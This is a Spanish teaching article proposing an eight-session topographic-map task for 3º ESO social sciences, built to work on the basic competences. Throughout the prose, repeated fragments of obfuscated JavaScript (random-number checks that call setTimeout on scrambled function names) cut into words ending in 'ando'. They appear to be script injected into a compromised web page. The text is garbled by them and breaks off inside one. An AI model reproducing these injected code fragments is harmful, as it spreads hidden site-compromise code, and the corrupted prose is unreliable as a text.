EL MAPA TOPOGRÁFICO: UN BUEN RECURSO PARA TRABAJAR LAS COMPETENCIAS.

Autora: Fermina Acevedo Padilla

Bajo el título El topográfico: un buen recurso para trabajar las competencias presentamos una propuesta didáctica categorizada como tarea, que permite desarrollar  todas las competencias básicas y repasar a la par gran parte de los contenidos trabajados durante todo el curso por el alumnado de 3º ESO en la materia de Ciencias Sociales. Precisa para su ejecución de ocho sesiones y se encuadra en la recta final del curso.

Introducción

El creciente poder del conocimiento en las sociedades desarrollas y la necesaria convergencia educativa europea, nos llevan a plantearnos nuevos modos de organizar y concebir la práctica docente, es decir, adoptar las Competencias Básicas como elementos primordiales de nuestras programaciones, pues son aprendizajes imprescindibles e integradores, que permiten aplicar los saberes adquiridos en diferentes situaciones.

Considerandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando ambos factores, presentamos esta propuesta didáctica que ilustra cómo integrar las competencias básicas en la vida real de un aula en el que se trabaja la Geografía de 3º de ESO.

Proponemos una atractiva tarea que partiendo de un mapa topográfico, permite, no sólo, sintetizar y aplicar gran parte de los contenidos establecidos por el Decreto 83/2007 para dicho curso, sino  reforzar y evaluar las competencias básicas trabajadas durante todo el año, fomentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el conocimiento del entorno escolar, involucrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a las familias, y compilandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando información de interés social.

Antes de desgranar los ejercicios y las actividades que conforman esta tarea, es preciso hacer algunas aclaraciones y puntualizaciones sobre las competencias básicas. Posteriormente estableceremos los objetivos, las competencias básicas, los contenidos, la metodología, los criterios de evaluación  y los pormenores de esta tarea.

1.- Punto de partida: Las competencias.

Las competencias son un elemento novedoso[1], implantadas por la LOE siguiendo las recomendaciones de la Comisión Europea de Educación, con la intención de crear un marco educativo común. Y a la par, garantizar que los jóvenes, al finalizar la ESO, puedan incorporarse de manera satisfactoria a la vida adulta y activa, siendo capaces de desarrollar aprendizajes a lo largo de la vida.  De ahí que Escamillas (2008)  las definan como: “capacidades relacionadas con el saber hacer, una dimensión que contempla lo teórico, lo comprensivo, lo práctico y la actitud”. Por su complejidad se erige como un elemento de formación al que hay que acercarse de  manera convergente (desde distintas materias) y gradual (en distintos momentos y diferentes situaciones de aprendizaje-cursos, etapas).

El carácter socializador e integrador de nuestra materia nos permite trabajar las ocho competencias[2], las cuales se adquieren mediante la resolución de tareas, aspecto en el que parecen coincidir todos los expertos.

Las competencias imponen una metodología que se articula en tres niveles, con los que tenemos que familiarizarnos, porque suelen generar equívocos entre los profanos.

Los ejercicios conforman la base, y son acciones de respuesta cerrada, perfectamente identificables, cuyo fin es comprobar el grado de adquisición de los conocimientos.

La actividad es una acción o conjunto de acciones  orientadas a la adquisición de algún conocimiento nuevo o a la utilización de algún conocimiento en una forma diferente. Suelen tener una respuesta abierta, que facilita la adquisición de nuevos conocimientos y prácticas/comportamientos.

En la cúspide, encontramos la tarea, acción o conjunto de acciones orientadas a la resolución de una situación-problema, dentro de un contexto definido, mediante la combinación de todos los saberes disponibles –aprendidos durante todo el curso- que permiten la elaboración de un producto relevante socialmente, tales como una exposición, un periódico escolar, una página web, un libro recopilatorio, etc.

Debemos concretar las claves de esta tarea estableciendo cuatro aspectos esenciales:

- El contexto o situación real en la que se va trabajar y mostrar los resultados.

- Los contenidos previos necesarios para comprender y ejecutar la tarea.

- Los recursos  necesarios.

- Las competencias que se van a adquirir o consolidar con la resolución de la tarea.

2.- LA TAREA DE FIN DE CURSO

Partiendo de los presupuestos constructivistas emprendemos el diseño de esta tarea  que consiste en analizar e interpretar un mapa topográfico del entorno más inmediato.

Como no podía ser menos, la planificación de la tarea es rigurosa e integradora, cobrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sentido todas y cada unas de las actividades y ejercicios propuestos, orientados a la aplicación de los saberes y competencias trabajadas durante el curso.

Además del pragmatismo obvio, la tarea tendrá gran relevancia en el entorno del alumnado, ya que permitirá censar un gran número de topónimos, no recogidos por la cartografía, y esenciales para entender el significado y la singularidad del parcelario.

La colaboración de la familia y del entorno en la recogida y ubicación de los topónimos  y la posterior edición de un texto y un mapa topográfico  virtual, garantizan la repercusión social que tiene que tener toda tarea.

En cuanto al contexto de aplicación está pensada para llevarla a cabo en un instituto de enseñanza secundaria enclavado en el mundo rural, ya que los alumnos conocen bien el término municipal y aún más sus progenitores, pues viven de él.

2.1. Objetivos didácticos

  • Recapitular y aplicar gran parte de los contenidos de 3º ESO:
  • Fomentar el conocimiento del entorno educativo
  • Integrar las TICS como una fuente y medio de difusión de la información.
  • Implicar a las familias
  • Apostar por un nuevo modelo organizativo del proceso de enseñanza aprendizaje basado en las competencias.

2.2. Competencias básicas.

Con esta tarea pretendemos cerrar la programación de aula, por lo que trabajaremos todas las competencias básicas, de manera equilibrada, como veremos a continuación,  y lo que es más importante, podremos evaluar su dominio.

De manera concreta trabajarán la competencia:

  1. 1. Lingüística

-          Entrevistandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}